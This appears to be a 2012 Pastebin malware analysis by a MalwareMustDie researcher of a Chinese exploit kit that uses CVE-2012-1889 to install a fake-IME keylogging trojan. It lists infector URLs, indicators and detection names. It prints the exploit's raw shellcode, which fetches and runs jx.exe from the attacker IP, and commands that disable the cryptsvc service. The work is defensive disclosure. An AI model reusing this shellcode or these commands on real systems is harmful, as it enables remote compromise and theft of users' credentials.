unixfreaxjp

Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan

Sep 29th, 2012
489
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 18.50 KB | None | 0 0
  1. * * Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan * *
  2. ================================
  3. CHINESE FAKE IME INFECTIONS
  4. STARTING FAKE NET SERVICE
  5. STARTING CRYPTER SERVICE
  6. INFO STEALER
  7. Found/analysis:
  8. #MalwareMustDie / @unixfreaxjp
  9. ================================
  10. -----------
  11. Infector IP:
  12. -----------
  13. IP: 222.73.57.117
  14. inetnum: 222.64.0.0 - 222.73.255.255
  15. netname: CHINANET-SH
  16. descr: CHINANET shanghai province network
  17. descr: China Telecom
  18. descr: No1,jin-rong Street
  19. descr: Beijing 100032
  20. country: CN
  21. -----------
  22. Info:
  23. -----------
  24. person: Wu Xiao Li
  25. address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
  26. country: CN
  27. phone: +86-21-63630562
  28. fax-no: +86-21-63630566
  29. nic-hdl: XI5-AP
  30. mnt-by: MAINT-CHINANET-SH
  31. changed: [email protected] 20010510
  32. source: APNIC
  33. -----------
  34. Infector urls:
  35. -----------
  36. h00p://9be14ngfsd.pppdiy.com/jx/xop.html
  37. h00p://9f515lzff3.pppdiy.com/xy/xop.html
  38. h00p://9kpgfwqdrj.pppdiy.com/hx/xop.html
  39. h00p://9mf9x3cl55.pppdiy.com/tl/xop.html
  40. h00p://9spxqc71fa.pppdiy.com/jy/xop.html
  41. h00p://s35fc3qiyl.pppdiy.com/wd/xop.html
  42. h00p://s3ebb5z4sk.pppdiy.com/wd/xop.html
  43. h00p://s52csz5u47.pppdiy.com/wd/xop.html
  44. h00p://s5c2ouavle.pppdiy.com/ny/xop.html
  45. h00p://s9inw8nkk9.pppdiy.com/yl/xop.html
  46. h00p://74jjdqugds.pppdiy.com/zt/xop.html
  47. h00p://75kay4lxj8.pppdiy.com/jy/xop.html
  48. h00p://67ldbpbmmj.pppdiy.com/jy/xop.html
  49. h00p://rq2e9k4ti8.pppdiy.com/xy/xop.html
  50. h00p://rre11swub9.pppdiy.com/yh/xop.html
  51. h00p://436p1bwt5s.pppdiy.com/wd/xop.html
  52. h00p://4a41nvbsst.pppdiy.com/tl/xop.html
  53. h00p://4bo1ocjpk9.pppdiy.com/wm/xop.html
  54. h00p://4eb2c9aupa.pppdiy.com/hx/xop.html
  55. h00p://4ekyz6afnh.pppdiy.com/jy/xop.html
  56. h00p://4gjoqgnvym.pppdiy.com/jy/xop.html
  57. h00p://4j4yxxyugh.pppdiy.com/wd/xop.html
  58. h00p://4s2aqluitq.pppdiy.com/yl/xop.html
  59. h00p://52jbsoqe53.pppdiy.com/ah/xop.html
  60. h00p://rkiit9hy1a.pppdiy.com/zt/xop.html
  61. h00p://rldq7secto.pppdiy.com/jy/xop.html
  62. h00p://roapzl6ao6.pppdiy.com/yl/xop.html
  63. h00p://rohws731yt.pppdiy.com/tl/xop.html
  64. h00p://3q4cnllxe2.pppdiy.com/yl/xop.html
  65. h00p://2e1t8v8z9v.pppdiy.com/zt/xop.html
  66. h00p://2kqi7tk2tx.pppdiy.com/wd/xop.html
  67. h00p://2nzysx8qfy.pppdiy.com/xy/xop.html
  68. h00p://2pg54c2ay2.pppdiy.com/ty/xop.html
  69. h00p://2tvypppa1t.pppdiy.com/jx/xop.html
  70. h00p://2zaco8gjga.pppdiy.com/xy/xop.html
  71. h00p://31fclefhp5.pppdiy.com/jy/xop.html
  72. h00p://37fs5qo4q5.pppdiy.com/jy/xop.html
  73. h00p://3p3sivfs1w.pppdiy.com/jy/xop.html
  74. h00p://rceta3uznz.pppdiy.com/xy/xop.html
  75. h00p://11a1tgjoav.pppdiy.com/wd/xop.html
  76. h00p://quyi6g8jz8.pppdiy.com/zt/xop.html
  77. h00p://r7ykgk31xl.pppdiy.com/ny/xop.html
  78. h00p://r89i2jzv72.pppdiy.com/ah/xop.html
  79. h00p://r8cvnadv11.pppdiy.com/jx/xop.html
  80. h00p://r8v7by8hl7.pppdiy.com/wm/xop.html
  81. h00p://r9mdp167ou.pppdiy.com/xy/xop.html
  82. h00p://ra5dfl2dhp.pppdiy.com/tl/xop.html
  83. h00p://q4u427a9d9.pppdiy.com/wl/xop.html
  84. h00p://qbfjz6vs2b.pppdiy.com/ty/xop.html
  85. h00p://qfckl9xclm.pppdiy.com/xy/xop.html
  86. h00p://qoxvbbwxxv.pppdiy.com/jy/xop.html
  87. h00p://qpm2jb8vds.pppdiy.com/xy/xop.html
  88. h00p://qrbvhfpnfi.pppdiy.com/my/xop.html
  89. h00p://qtxjsy4psn.pppdiy.com/wd/xop.html
  90. h00p://ppmcnqlq4b.pppdiy.com/hx/xop.html
  91. h00p://pnj1c3glru.pppdiy.com/wd/xop.html
  92. h00p://pnrks68rrs.pppdiy.com/wd/xop.html
  93. h00p://pn87z1eiaj.pppdiy.com/yl/xop.html
  94. h00p://pcsssued3v.pppdiy.com/tl/xop.html
  95. h00p://p2rb4o7xo3.pppdiy.com/ty/xop.html
  96. h00p://p444fcmod8.pppdiy.com/jy/xop.html
  97. h00p://oy3eewl8dj.pppdiy.com/wm/xop.html
  98. h00p://z1v1awk14w.pppdiy.com/zx/xop.html
  99. h00p://zlpr6v2wdp.pppdiy.com/wd/xop.html
  100. h00p://zrxodxxsdb.pppdiy.com/jy/xop.html
  101. h00p://x82ndlgusg.pppdiy.com/xy/xop.html
  102. h00p://xgbex2gqur.pppdiy.com/wd/xop.html
  103. h00p://xinfejn8sh.pppdiy.com/yh/xop.html
  104. h00p://ypqdgh1spm.pppdiy.com/zx/xop.html
  105. h00p://yzua8al89b.pppdiy.com/wd/index.ht
  106. h00p://u3gltdtoo4.pppdiy.com/jy/xop.html
  107. h00p://vev8ncrkcm.pppdiy.com/jx/xop.html
  108. h00p://vlbujx6d19.pppdiy.com/xy/xop.html
  109. h00p://vouludav9m.pppdiy.com/wd/xop.html
  110. h00p://vqouin8qdg.pppdiy.com/wd/xop.html
  111. h00p://wjjxh168lj.pppdiy.com/wd/index.ht
  112. h00p://ssx2pc47nw.pppdiy.com/ty/xop.html
  113. h00p://sw29diefib.pppdiy.com/wd/xop.html
  114. h00p://t1zsxal6p5.pppdiy.com/ty/xop.html
  115. h00p://pq58ow6ydk.pppdiy.com/yl/xop.html
  116. h00p://rlcensq6ds.pppdiy.com/wd/xop.html
  117. h00p://s9ms36eb5q.pppdiy.com/ah/xop.html
  118. h00p://p8t89f1q3x.pppdiy.com/xy/xop.html
  119. h00p://pcsir3ijj9.pppdiy.com/zt/xop.html
  120. h00p://pjv68ibarl.pppdiy.com/ah/xop.html
  121. h00p://ow858ymp4d.pppdiy.com/xx/xop.html
  122. h00p://opu3mx9u8s.pppdiy.com/tl/xop.html
  123. h00p://o1v1ia7fzp.pppdiy.com/ah/xop.html
  124. h00p://nq9k8bhtgy.pppdiy.com/tl/xop.html
  125. h00p://mj3aqytgna.pppdiy.com/wd/xop.html
  126. h00p://mkjbyf6vr8.pppdiy.com/xy/xop.html
  127. h00p://lsjq1ic827.pppdiy.com/zt/xop.html
  128. h00p://ln9jwxhwp2.pppdiy.com/jy/xop.html
  129. h00p://kltudl7ixd.pppdiy.com/wd/xop.html
  130. h00p://kb8ngrsrkt.pppdiy.com/zx/xop.html
  131. h00p://ki9hfgy8eb.pppdiy.com/wd/index.ht
  132. h00p://jqqm6ksd4u.pppdiy.com/jx/xop.html
  133. h00p://joez462a36.pppdiy.com/xy/xop.html
  134. h00p://ir1mxyqbe1.pppdiy.com/jy/xop.html
  135. h00p://hrwvzspefk.pppdiy.com/my/xop.html
  136. h00p://hwwlnwoh5u.pppdiy.com/jx/xop.html
  137. h00p://hehqxbhtrr.pppdiy.com/xy/xop.html
  138. h00p://gzfuswbru9.pppdiy.com/xy/xop.html
  139. h00p://gur1nihj4g.pppdiy.com/wd/xop.html
  140. h00p://gcrbfl8iyi.pppdiy.com/jx/xop.html
  141. h00p://fs12vmyw85.pppdiy.com/wd/xop.html
  142. h00p://fs9kdc75dk.pppdiy.com/jy/xop.html
  143. h00p://dxonfcd1zh.pppdiy.com/zt/xop.html
  144. h00p://dfmta9juu5.pppdiy.com/ah/xop.html
  145. h00p://di6uj6rqk3.pppdiy.com/jy/xop.html
  146. h00p://85qcnilv1k.pppdiy.com/my/xop.html
  147. h00p://9fnq4ekiqd.pppdiy.com/wd/index.ht
  148. h00p://4oy56fcvmg.pppdiy.com/jy/xop.html
  149. h00p://x7zzmg5b1v.pppdiy.com/jx/xop.html
  150. h00p://zgxx2raoak.pppdiy.com/jx/xop.html
  151. h00p://wxf3mzd3zn.pppdiy.com/jx/xop.html
  152. h00p://wzrkh2m8xl.pppdiy.com/xx/xop.html
  153. h00p://uc18awkxod.pppdiy.com/my/xop.html
  154. h00p://v2229jswhx.pppdiy.com/wd/xop.html
  155. h00p://pxkxilbpos.pppdiy.com/wm/xop.html
  156. h00p://rakwmwhpve.pppdiy.com/xy/xop.html
  157. h00p://nsqjxjbfcs.pppdiy.com/ah/xop.html
  158. h00p://ny5iceirim.pppdiy.com/jx/xop.html
  159. h00p://iz5lh4r5qi.pppdiy.com/yl/xop.html
  160. h00p://agz5utxh9u.pppdiy.com/wd/index.ht
  161. h00p://4fp9g7s3tr.pppdiy.com/xy/xop.html
  162. h00p://57vcqwfb8a.pppdiy.com/jy/xop.html
  163. h00p://oqlpdxtgux.pppdiy.com/zt/xop.html
  164. h00p://ocd1bm7coa.pppdiy.com/xy/xop.html
  165. h00p://od5aaz7m5e.pppdiy.com/jx/xop.html
  166. h00p://odvn3j955e.pppdiy.com/zx/xop.html
  167. h00p://ogd48fw2lt.pppdiy.com/tl/xop.html
  168. h00p://oixgmmsng1.pppdiy.com/xy/xop.html
  169. h00p://ntuhp4ou1t.pppdiy.com/yl/xop.html
  170. h00p://oaicu6zotz.pppdiy.com/zt/xop.html
  171. h00p://oannucq891.pppdiy.com/jx/xop.html
  172. h00p://nmwlyg9jtd.pppdiy.com/xy/xop.html
  173. h00p://nkkprh379v.pppdiy.com/wd/index.ht
  174. h00p://nf8ri2a2ah.pppdiy.com/zt/xop.html
  175. h00p://myx7rlgfgz.pppdiy.com/yl/xop.html
  176. h00p://mzjqths79w.pppdiy.com/yl/xop.html
  177. h00p://n19yfqnfgx.pppdiy.com/jy/xop.html
  178. h00p://n318aq72eb.pppdiy.com/jy/xop.html
  179. h00p://n3zxb481z3.pppdiy.com/yh/xop.html
  180. h00p://n8dx15kr7y.pppdiy.com/xy/xop.html
  181. h00p://muy6w1ufrw.pppdiy.com/jx/xop.html
  182. h00p://mvhnrd8c9o.pppdiy.com/jy/xop.html
  183. h00p://mvzn8qs8lg.pppdiy.com/wd/xop.html
  184. h00p://mu5dptjoda.pppdiy.com/xy/xop.html
  185. h00p://msogw56yis.pppdiy.com/xy/xop.html
  186.  
  187. ======================
  188. ANALYSIS
  189. ======================
  190. --02:53:10-- h00p://9be14ngfsd.pppdiy.com/jx/xop.html
  191. => `xop.html'
  192. Resolving 9be14ngfsd.pppdiy.com... 222.73.57.117
  193. Connecting to 9be14ngfsd.pppdiy.com|222.73.57.117|:80... connected.
  194. h00p request sent, awaiting response... 200 OK
  195. Length: 9,950 (9.7K) [text/html]
  196. 02:53:15 (2.74 KB/s) - `xop.html' saved [9950/9950]
  197.  
  198. -----------------------------
  199.  
  200. [h00p] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
  201. // ActiveX : f6d90f11-9c73-11d3-b32e-00c04f990bb4 Droped..
  202. <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
  203. <meta content="IE=7" h00p-equiv="X-UA-Compatible"/
  204. ------------shellcode executed------------------
  205.  
  206. 58 58 58 58 eb 10 5b 4b 33 c9 66 b9 b8 03 80 34 // CVE-2012-1889
  207. 0b bd e2 fa eb 05 e8 eb ff ff ff 54 a3 be bd bd
  208. e2 d9 1c 8d bd bd bd 36 fd b1 36 cd a1 10 36 d5
  209. b5 36 4a d7 ac e4 55 03 bf bd bd 2d 5f 45 d5 8e
  210. 8f bd bd d5 e8 ce d8 cf e9 36 fb b1 55 03 bc bd
  211. bd 36 55 d7 b8 e4 55 23 bf bd bd 5f 44 d5 d2 d3
  212. bd bd d5 c8 cf d1 d0 e9 42 ab 38 7d c8 ae d5 d2
  213. d3 bd bd d5 c8 cf d1 d0 e9 36 fb b1 55 33 bc bd
  214. bd 36 55 d7 bc e4 55 d3 bf bd bd 5f 44 d5 d1 8e
  215. 8f bd d5 ce d5 d8 d1 e9 36 fb b1 55 d2 bc bd bd
  216. 36 55 d7 bc e4 55 f2 bf bd bd 5f 44 3c 51 bd bc
  217. bd bd 36 61 3c 7e 3d bd bd bd d7 bd d7 a7 ee d7
  218. bd 42 eb e1 8e 7d fd 3d 81 be bd c8 44 7a b9 be
  219. e1 fa 93 d8 7a f9 be b9 c5 d8 bd bd 8e 74 ec ec
  220. ee ea ec 8e 7d 36 fb e5 55 9f bc bd bd 3e 45 bd
  221. 54 1e bd bd bd 2d d7 bd d7 bd d7 be d7 bd d7 bf
  222. d5 bd bd bd 7d ee 36 fb 99 55 bc bc bd bd 34 fb
  223. dd d7 bd ed 42 eb 95 34 fb d9 36 fb dd d7 bd d7
  224. bd d7 bd d7 b9 d7 bd ed 42 eb 91 d7 bd d7 bd d7
  225. bd d5 a2 bd b2 bd ed 42 eb 81 34 fb c5 36 f3 d9
  226. 3d c1 b5 42 09 c9 b1 3d c1 b5 42 bd c9 b8 3d c9
  227. b5 42 09 5f 56 34 3b 3d bd bd bd 7a fb cd bd bd
  228. bd bd 7a fb c9 bd bd bd bd d7 bd d7 bd d7 bd 36
  229. fb dd ed 42 eb 85 36 3b 3d bd bd bd d7 bd 30 f3
  230. c9 ec 42 cb cd ed 42 cb dd 42 eb 8d 42 cb dd 42
  231. eb 89 42 cb c5 42 eb fd 36 46 8e 7d 8e 66 3c 51
  232. bd bf bd bd 36 71 3e 45 e9 c0 b5 34 a1 bc 3e 7d
  233. b9 56 4e 36 71 36 64 3e 7e ad 8e 7d ed ec ee ed
  234. ed ed ed ed ed ea ed ed 42 eb b5 36 c3 e9 55 ad
  235. bc bd bd 55 d8 bd bd bd d5 de cb ca bd d5 ce d5
  236. d9 d2 e9 36 fb b1 55 99 bd bd bd 34 fb 81 d9 1c
  237. b9 bd bd bd 30 1d dd 42 42 42 d7 d8 42 cb 81 36
  238. fb ad 55 b5 bd bd bd 8e 66 ee ee ee ee 42 6d 3d
  239. 85 55 3d 85 54 c8 ac 3c c5 b8 2d 2d 2d 2d c9 b5
  240. 36 42 e8 36 51 30 fd b8 42 5d 55 1b bd bd bd 7e
  241. 55 1d bd bd bd 05 ac bc b9 3d 7f b1 bd 55 2e bd
  242. bd bd 3c 51 bd bc bd bd 36 41 3e 7a b9 7a ba 8f
  243. c9 2c b1 7a fa b9 de 34 6c f2 7a fa b5 1d d8 2a
  244. 76 7a fa b1 ec fd 07 c2 7a fa ad 83 a0 0b 84 7a
  245. fa a9 05 d4 69 a6 7a fa a5 03 c2 db 1d 7a fa a1
  246. 41 14 8a 10 7a fa 9d 25 b7 ad 45 d9 1c 8d bd bd
  247. bd 36 fd b1 36 cd a1 10 36 d5 b5 36 4a d7 b9 e4
  248. 55 e9 bd bd bd 2d 5f 45 d5 8e 8f bd bd d5 e8 ce
  249. d8 cf e9 36 bb 55 e8 42 42 42 36 55 d7 b8 e4 55
  250. 88 bd bd bd 5f 44 8e 42 ea 42 eb b9 56 bf e5 7e
  251. 55 44 42 42 42 e6 7b ba 05 34 e2 bc db 7a fa b8
  252. 42 5d 7e ee 36 61 ee d7 fd d5 bd ad bd bd ea 36
  253. fb 9d 55 a5 42 42 42 e5 7e ec eb 36 c8 81 36 c9
  254. 93 c5 be 48 eb 36 cb 9d be 48 8e 74 f4 fc 10 be
  255. 78 8e 66 b2 03 ad 87 6b c9 b5 7c 76 ba be 67 fd
  256. 56 4c 86 a2 c8 5a e3 36 e3 99 be 60 db 36 b1 f6
  257. 36 e3 a1 be 60 36 b9 36 be 78 16 e3 e4 7e 55 60
  258. 41 42 42 0f 4f 5f 49 84 5f c0 3e 67 f5 c6 80 8f
  259. c9 2c b1 38 62 12 06 de 34 6c f2 ec fd 07 c2 1d
  260. d8 2a 76 a3 19 d9 52 2e 8f 59 29 33 ae b7 11 7f
  261. a4 f6 bc 79 30 a2 c9 ea db b0 42 fe 03 11 66 c0
  262. 4d 18 27 ef 43 1a 67 83 a0 0b 84 05 d4 69 a6 03
  263. c2 db 1d 41 14 8a 10 25 b7 ad 45 3d 6b 12 27 46
  264. ee a8 db d5 c9 c9 cd 87 92 92 8f 8f 8f 93 8a 8e
  265. 93 88 8a 93 8c 8c 8a 92 d8 c5 d8 92 d7 c5 93 d8
  266. c5 d8 bd bd bd bd bd bd bd bd bd bd bd bd bd bd
  267. bd bd bd bd bd bd ea ea
  268.  
  269. ↑XOR and found h00p://222.73.57.117/exe/jx.exe // path found;
  270.  
  271.  
  272. -------------------------------
  273. --03:01:26-- h00p://222.73.57.117/exe/jx.exe <===== TROJAN FAKE IME KEYLOGGING....
  274. => `jx.exe'
  275. Connecting to 222.73.57.117:80... connected.
  276. h00p request sent, awaiting response... 200 OK
  277. Length: 48,128 (47K) [application/octet-stream]
  278. ------------------------------------
  279.  
  280. Sections:
  281. UPX0 0x1000 0x7000 0 <<<<<<< PACKED!!
  282. UPX1 0x8000 0xc000 46592 <<<<<<< PACKED!!
  283. UPX2 0x14000 0x1000 512 <<<<<<< PACKED!!
  284.  
  285.  
  286. //unpacking.....
  287. UPX 3.07 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 08th 2010
  288. File size Ratio Format Name
  289. ------------------ ------ ----------- -----------
  290. 58880 <- 48128 81.74% win32/pe sample
  291. Unpacked 1 file.
  292.  
  293. -------bin analysis------
  294.  
  295. Fail CRC: Claimed: 0 Actual: 60344
  296. Fail Compile Time: 2033-11-12 07:06:07
  297. Compiler: Microsoft Visual C++ v6.0
  298.  
  299. //strange,,,,
  300. 0x40402c CreateToolhelp32Snapshot
  301. 0x404054 Process32First
  302. 0x404080 Process32Next
  303.  
  304. // Renaming itself....
  305. call sub_40161C
  306. call sub_401693
  307. mov ebx, offset aJx3client_exe ; "JX3Client.exe"
  308.  
  309.  
  310. --------------traces---------
  311.  
  312. // Malware OP traces...
  313.  
  314. 000000002FE6 0000004047E6 0 MoveFileA
  315. 000000003032 000000404832 0 WriteFile
  316. 00000000303E 00000040483E 0 CreateFileA
  317. 00000000304C 00000040484C 0 WinExec
  318. 000000003074 000000404874 0 CopyFileA
  319.  
  320. // keystroke controlling...
  321.  
  322. 0000000030C0 0000004048C0 0 GetKeyboardLayoutList
  323. 0000000030D8 0000004048D8 0 GetKeyboardLayoutNameA
  324. 0000000030F2 0000004048F2 0 ActivateKeyboardLayout
  325. 00000000310C 00000040490C 0 GetKeyboardLayout
  326. 000000003120 000000404920 0 LoadKeyboardLayoutA
  327. 000000003136 000000404936 0 UnloadKeyboardLayout
  328.  
  329. // IME Traces...
  330.  
  331. IMM32.dll.ImmGetDescriptionA Hint[0]
  332. IMM32.dll.ImmInstallIMEA Hint[0]
  333. IMM32.dll.ImmIsIME Hint[0]
  334.  
  335. // temp OPS data
  336.  
  337. 00000000380C 00000040520C 0 %c:\Recycled\%d.tmp
  338. 000000003820 000000405220 0 %c:\RECYCLER\%d.tmp
  339.  
  340. // Crypter service..
  341. 00000000E05C 00000040FA5C 0 sc delete cryptsvc
  342. 00000000E070 00000040FA70 0 sc config cryptsvc start= disabled
  343. 00000000E094 00000040FA94 0 net stop cryptsvc
  344.  
  345. //registry added traces
  346.  
  347. 00000000E0A8 00000040FAA8 0 %s%s%d.dll // kbdus.dll
  348. 00000000E0DC 00000040FADC 0 SOFTWARE\kingsoft\JX3\zhcn
  349. 00000000E0F8 00000040FAF8 0 JX3Client // JX3Client.exe
  350. 00000000E104 00000040FB04 0 Software\Microsoft\Windows\ShellNoRoam\MUICache
  351. 00000000E134 00000040FB34 0 %sdllcache\%s
  352. 00000000E144 00000040FB44 0 %syu%s //
  353.  
  354.  
  355. //Drops
  356. C:\WINDOWS\system32\chinasougou.ime
  357. C:\WINDOWS\system32\yumidimap.dll
  358. C:\WINDOWS\system32\net1.exe
  359.  
  360.  
  361. //Malwareservice...
  362. Filename: net1.exe
  363. MD5: 3f14c041342e3fba343f2a1d11e74bba
  364. SHA-1: 4221467faee4926d692bd5ae71cf0a37f326bf42
  365. File Size: 124928 Bytes
  366. Command Line: net1 stop cryptsvc
  367.  
  368. //Crypter Service:
  369. Filename: sc.exe
  370. MD5: a48b1c06219a01a60cd8d4d45440bde9
  371. SHA-1: 34af23607ad5afa9e61b6a96cec811e6bdc50b4a
  372. File Size: 31232 Bytes
  373. Command Line: sc config cryptsvc start= disabled
  374.  
  375. ------------------------------------------------------
  376. VIRUS TOTAL CHECKS
  377. -----------------------------------------------------
  378. First Check in VT: (PACKED/ORIGINAL)
  379. https://www.virustotal.com/file/62f1707394325b5c3ac09df8e362b9a0710fbc956b3327f419063e24182c1e5b/analysis/1348946206/
  380. McAfee : Artemis!BBFC347F66C1
  381. K7AntiVirus : Riskware
  382. TheHacker : Posible_Worm32
  383. F-Prot : W32/Heuristic-114!Eldorado
  384. ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
  385. TrendMicro-HouseCall : TROJ_GEN.RCBCEHF
  386. Kaspersky : HEUR:Trojan.Win32.Generic
  387. F-Secure : Dropped:Trojan.PWS.FakeIME.B
  388. VIPRE : Trojan.Win32.Generic!BT
  389. AntiVir : TR/ATRAPS.Gen
  390. TrendMicro : TROJ_GEN.RCBCEHF
  391. McAfee-GW-Edition : Artemis!BBFC347F66C1
  392. Jiangmin : Trojan/Generic.algbo
  393. Microsoft : PWS:Win32/Lolyda.BF
  394. Commtouch : W32/Heuristic-114!Eldorado
  395. AhnLab-V3 : Trojan/Win32.Xema
  396. VBA32 : TrojanPSW.QQTen.ng
  397. PCTools : Trojan.Gen
  398. Ikarus : Trojan-PWS.Win32.Lolyda
  399. Fortinet : W32/Onlinegames.QBF!tr
  400. AVG : unknown virus Win32/DH{HhM6SEVn}
  401. Panda : Suspicious file
  402. ---------------------------------------------------------------------
  403. First Check in VT: (UNPACKED)
  404. https://www.virustotal.com/file/f63345d3adc06ca20aafe0e9ab4b0a2c47f4dcff71b0d696dd8ae8412626fe4c/analysis/1348946229/
  405.  
  406. F-Secure : Dropped:Trojan.PWS.FakeIME.B
  407. DrWeb : BackDoor.PcClient.5930
  408. GData : Dropped:Trojan.PWS.FakeIME.B
  409. Symantec : Suspicious.Cloud.5
  410. Norman : W32/OnLineGames.NVOE
  411. ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
  412. eScan : Dropped:Trojan.PWS.FakeIME.B
  413. Fortinet : W32/Onlinegames.QBF!tr
  414. Emsisoft : Trojan-PWS.Win32.Lolyda!IK
  415. VBA32 : TrojanPSW.QQTen.ng
  416. Kaspersky : HEUR:Trojan.Win32.Generic
  417. Jiangmin : Trojan/Generic.algbo
  418. Rising : Trojan.Win32.Fednu.uhc
  419. Ikarus : Trojan-PWS.Win32.Lolyda
  420. AntiVir : TR/Crypt.ZPACK.Gen
  421. AVG : unknown virus Win32/DH{HhM6SEVn}
  422. Panda : Suspicious file
  423. ViRobot : Trojan.Win32.A.PSW-Frethoq.51200
  424. Comodo : TrojWare.Win32.Poison.QBF
  425.  
  426. INFECTOR: XOP.HTML
  427. https://www.virustotal.com/file/c9b661491464aecd75cee4bc205d3076829b1b4c9915e2999d15d2a89536f421/analysis/1348946760/
  428.  
  429. eScan : Exploit.CVE-2012-1889.Gen
  430. nProtect : Exploit.CVE-2012-1889.Gen
  431. CAT-QuickHeal : Exploit.CVE.2012.1889
  432. McAfee : Exploit-CVE2012-1889
  433. K7AntiVirus : Exploit
  434. F-Prot : JS/CVE-1889
  435. Norman : ShellCode.AA
  436. TotalDefense : JS/Tnega.VKD
  437. Avast : JS:CVE-2012-1889 [Expl]
  438. eSafe : JS.ShellCode.Aurora
  439. ClamAV : Exploit.CVE_2012_1889-6
  440. Kaspersky : HEUR:Exploit.Script.Generic
  441. BitDefender : Exploit.CVE-2012-1889.Gen
  442. Sophos : Mal/JSShell-B
  443. Comodo : TestSignature.JS.Agent.SH
  444. F-Secure : Exploit:JS/CVE-2012-1889.A
  445. DrWeb : Exploit.CVE2012-1889
  446. VIPRE : Exploit.HTML.CVE-2012-1889 (v)
  447. AntiVir : Exp/JS.Shellcode.H
  448. McAfee-GW-Edition : Heuristic.BehavesLike.JS.Unwanted
  449. Emsisoft : Trojan.Script!IK
  450. ESET-NOD32 : JS/Exploit.Shellcode.A.gen
  451. Microsoft : Exploit:JS/ShellCode.AT
  452. GData : Exploit.CVE-2012-1889.Gen
  453. Commtouch : JS/CVE-1889
  454. AhnLab-V3 : JS/Agent
  455. Ikarus : Trojan.Script
  456. AVG : Exploit
  457.  
  458.  
  459. ====================================
  460. MALWARE MUST DIE!!!
  461. #MalwareMustDie
  462. Sept 29 2012 / @unixfreaxjp
  463. ===================================
Add Comment
Please, Sign In to add comment